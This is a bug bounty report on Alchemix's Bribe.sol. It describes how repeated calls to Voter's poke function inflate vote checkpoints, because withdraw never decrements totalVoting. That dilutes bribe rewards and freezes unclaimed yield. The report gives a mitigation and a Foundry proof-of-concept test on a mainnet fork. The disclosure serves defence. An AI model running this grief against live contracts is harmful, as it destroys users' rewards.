31409 - [SC - Critical] Users can grief Bribe rewards forcing them to b...
Submitted on May 18th 2024 at 15:43:37 UTC by @OxAlix2 for Boost | Alchemix
Report ID: #31409
Report type: Smart Contract
Report severity: Critical
Target: https://github.com/alchemix-finance/alchemix-v2-dao/blob/main/src/Bribe.sol
Impacts:
Permanent freezing of unclaimed yield
Griefing (e.g. no profit motive for an attacker, but damage to the users or the protocol)
Description
Brief/Intro
When users vote in the Voter contract, it calls Bribe::deposit to "save" this vote, so that later when rewards come in for that Bribe can be distributed to users who voted. The opposite happens when users reset/withdraw their votes. However, there's 1 anomaly between the Bribe's deposit and withdrawal, where on deposit, Bribe is "checkpointing" the votes using:
totalVoting += amount;
_writeVotingCheckpoint()And the opposite is not happening on the withdrawal, this allows users to mess up all the Bribe's rewards.
Vulnerability Details
When users vote in the Voter contract, it calls Bribe::deposit which increases the total votes of that Bribe, however, on withdrawal these votes aren't being subtracted. On the other hand, the Voter contract allows users to continuously call the poke function that resets and then vote again in the same gauges/bribes, without any condition on that function. This allows voters to continuously call the poke function to skyrocket the total votes checkpoints in the Bribe, remember when poke resets/withdraws the votes they are not being removed.
These total votes' checkpoints are being used in Bribe::earned, to calculate the earned amount to each voter, it is being divided by, https://github.com/alchemix-finance/alchemix-v2-dao/blob/main/src/Bribe.sol#L261, which wrongly decrease the rewards for each user.
Impact Details
Griefing of users, as their rewards will be a lot less than what they "deserve", if there were even some rewards left.
The remaining unclaimed rewards will remain stuck forever in the contract.
References
https://github.com/alchemix-finance/alchemix-v2-dao/blob/main/src/Bribe.sol#L319-L329
Mitigation
Add the following in Bribe::withdraw:
totalVoting -= amount;
_writeVotingCheckpoint();Proof of concept
Fork block number used: 19877251
function testGriefBribeRewards() public {
// Bribe config
uint256 usdcRewardAmount = 100e6;
hevm.prank(voter.admin());
voter.whitelist(usdc);
address bribeAddress = voter.bribes(voter.gauges(alUsdPoolAddress));
deal(address(usdc), address(this), usdcRewardAmount);
IERC20(usdc).approve(bribeAddress, usdcRewardAmount);
// Admin and Beef create locks
uint256 tokenId1 = createVeAlcx(admin, TOKEN_1, MAXTIME, false);
uint256 tokenId2 = createVeAlcx(beef, TOKEN_1, MAXTIME, false);
address[] memory pools = new address[](1);
pools[0] = alUsdPoolAddress;
uint256[] memory weights = new uint256[](1);
weights[0] = 5000;
// Admin and Beef vote
hevm.prank(admin);
voter.vote(tokenId1, pools, weights, 0);
hevm.prank(beef);
voter.vote(tokenId2, pools, weights, 0);
// Confirm voting success
assertGt(IBribe(bribeAddress).totalVoting(), 0);
// Increase time to reach just before epoch end
hevm.warp(IBribe(bribeAddress).getEpochStart(block.timestamp) + 2 weeks - 1 hours);
// Beef continously calls poke, messing up votes checkpoints in the Bribe contract
hevm.startPrank(beef);
voter.poke(tokenId2);
hevm.warp(block.timestamp + 1);
voter.poke(tokenId2);
hevm.warp(block.timestamp + 1);
voter.poke(tokenId2);
hevm.warp(block.timestamp + 1);
voter.poke(tokenId2);
hevm.warp(block.timestamp + 1);
voter.poke(tokenId2);
hevm.stopPrank();
// Rewards come in to the Bribe contract
IBribe(bribeAddress).notifyRewardAmount(usdc, usdcRewardAmount);
// Epoch ends
hevm.warp(block.timestamp + 1 hours);
// Voting still exists
assertGt(IBribe(bribeAddress).totalVoting(), 0);
// Rewards for each token is around 14 USDC where it should be 50 USDC (100 USDC / 2 tokens)
assertEq(IBribe(bribeAddress).earned(usdc, tokenId1) / 1e6, 14);
assertEq(IBribe(bribeAddress).earned(usdc, tokenId2) / 1e6, 14);
}Last updated
Was this helpful?